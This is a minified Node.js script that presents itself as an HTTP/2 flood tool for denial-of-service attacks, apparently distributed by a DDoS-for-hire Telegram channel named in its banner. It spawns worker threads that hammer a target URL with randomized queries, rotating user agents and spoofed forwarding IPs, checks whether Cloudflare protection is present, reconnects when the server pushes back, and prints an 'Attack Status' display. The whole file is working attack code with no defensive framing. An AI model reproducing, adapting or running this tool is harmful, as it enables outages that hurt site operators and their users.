const chalk=require("chalk"),http2=require("http2"),{Worker:e,isMainThread:t,workerData:f}=require("worker_threads"),os=require("os"),crypto=require("crypto"),{promisify:o}=require("util"),dns=require("dns"),{exec:a}=require("child_process"),config={MAX_RAM_PERCENTAGE:80,TIMEOUT_MS:12e4,MAX_REQUESTS_PER_SECOND:1e7,CONCURRENT_REQUESTS:100,RETRY_LIMIT:3},clear=o(e=>{a("win32"===os.platform()?"cls":"clear",t=>e(t))});let successCount=0;const getRandomIP=()=>Array.from({length:4},()=>Math.floor(256*Math.random())).join("."),getRandomUserAgent=()=>{let e=["Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15",];return e[Math.floor(Math.random()*e.length)]},generateRandomString=(e,t)=>{let f=Math.floor(Math.random()*(t-e+1))+e;return crypto.randomBytes(f).toString("hex")},detectAntiDDoS=async e=>{let t=[],f={Cloudflare:["cloudflare.com","cfdomains.com"]};try{let a=await o(dns.resolveNs)(e);a.forEach(e=>{Object.entries(f).forEach(([f,o])=>{o.some(t=>e.includes(t))&&!t.includes(f)&&t.push(f)})})}catch(r){console.error(chalk.hex("#ff00ff")("Error resolving DNS:",r.message))}return t},makeRequest=async e=>{let t=new URL(e),f=http2.connect(t.origin),o=async(a=0)=>new Promise((r,n)=>{let c={":method":"GET",":path":`${t.pathname}?${generateRandomString(3,10)}=${generateRandomString(10,25)}`,"user-agent":getRandomUserAgent(),"x-forwarded-for":getRandomIP()},$=f.request(c),l=Date.now();$.on("response",e=>{$.on("data",()=>{}),$.on("end",()=>{successCount++;let e=Date.now()-l;process.stdout.write(chalk.hex("#ff00ff")(`\rResponse time: ${e} ms | Success Count: ${successCount} `)),r()})}),$.on("error",t=>{if("ERR_HTTP2_GOAWAY_SESSION"===t.code)console.warn(chalk.hex("#ff00ff")("Received ERR_HTTP2_GOAWAY_SESSION, reconnecting...")),f.close(),setTimeout(()=>{makeRequest(e).then(r).catch(n)},1e3);else if(a<config.RETRY_LIMIT){let c=100*Math.pow(2,a);setTimeout(()=>o(a+1).then(r).catch(n),c)}else n(t)}),$.end()}),a=async()=>{let e=Array.from({length:config.CONCURRENT_REQUESTS},()=>o());await Promise.all(e)},r=setInterval(()=>a(),1e4/config.MAX_REQUESTS_PER_SECOND);return{intervalId:r,client:f}},handleRAMUsage=()=>{let e=os.totalmem(),t=e-os.freemem(),f=t/e*100;f>=config.MAX_RAM_PERCENTAGE&&(console.warn(chalk.hex("#ff00ff")(`RAM usage exceeded ${config.MAX_RAM_PERCENTAGE}%. Restarting script.`)),restartScript())},restartScript=()=>{process.exit(0)},exitScriptAfterTimeout=e=>{setTimeout(()=>{console.log(chalk.hex("#ff00ff")("Timeout reached. Exiting script.")),process.exit(0)},e)},banner=`
${chalk.hex("#ff00ff")("██╗░░░██╗██╗░░░██╗██╗")}
${chalk.hex("#ff00ff")("╚██╗░██╔╝██║░░░██║██║")}
${chalk.hex("#ff00ff")("░╚████╔╝░██║░░░██║██║")}
${chalk.hex("#ff00ff")("░░╚██╔╝░░██║░░░██║██║")}
${chalk.hex("#ff00ff")("░░░██║░░░╚██████╔╝██║")}
${chalk.hex("#ff00ff")("░░░╚═╝░░░░╚═════╝░╚═╝")}
${chalk.hex("#ff00ff")("Feel free to ask any questions Mate (make sure you hide your IP)!")}
${chalk.hex("#ff00ff")("Author: Yui ")}
${chalk.hex("#ff00ff")("Telegram Channel: t.me/YuiDDOS")}
${chalk.hex("#ff00ff")("Contact: @AimAbuse")}
${chalk.hex("#ff00ff")("--------------------------------------")}
`;if(t){let r=process.argv.slice(2),n=r[0],c=1e3*parseInt(r[1],10)||config.TIMEOUT_MS,$=parseInt(r[2],10)||1;(!n||isNaN(c)||isNaN($))&&(console.error(chalk.hex("#ff00ff")("Usage: node script.js <host> <time> <threads>")),process.exit(1)),(async()=>{await clear(),console.log(banner);let t=await detectAntiDDoS(new URL(n).hostname);console.log(chalk.hex("#ff00ff").bold("Attack Status:")),console.log(chalk.hex("#ff00ff")(`Target URL: ${n}`)),console.log(chalk.hex("#ff00ff")("Detected DDoS Protection:")),t.length>0?t.forEach(e=>console.log(chalk.hex("#ff00ff")(`- ${e}`))):console.log(chalk.hex("#ff00ff")("- None/Unknown")),console.log(chalk.hex("#ff00ff")("--------------------------------------"));for(let f=0;f<$;f++)new e(__filename,{workerData:{targetUrl:n}});setInterval(handleRAMUsage,5e3),exitScriptAfterTimeout(c)})()}if(!t){let{targetUrl:l}=f;(async()=>{try{let{intervalId:e,client:t}=await makeRequest(l);process.on("exit",()=>{clearInterval(e),t.close()}),process.on("error",e=>{console.error(chalk.hex("#ff00ff")("Error in worker:",e.message))})}catch(f){console.error(chalk.hex("#ff00ff")("Error during HTTP requests:",f.message)),process.exit(1)}})()}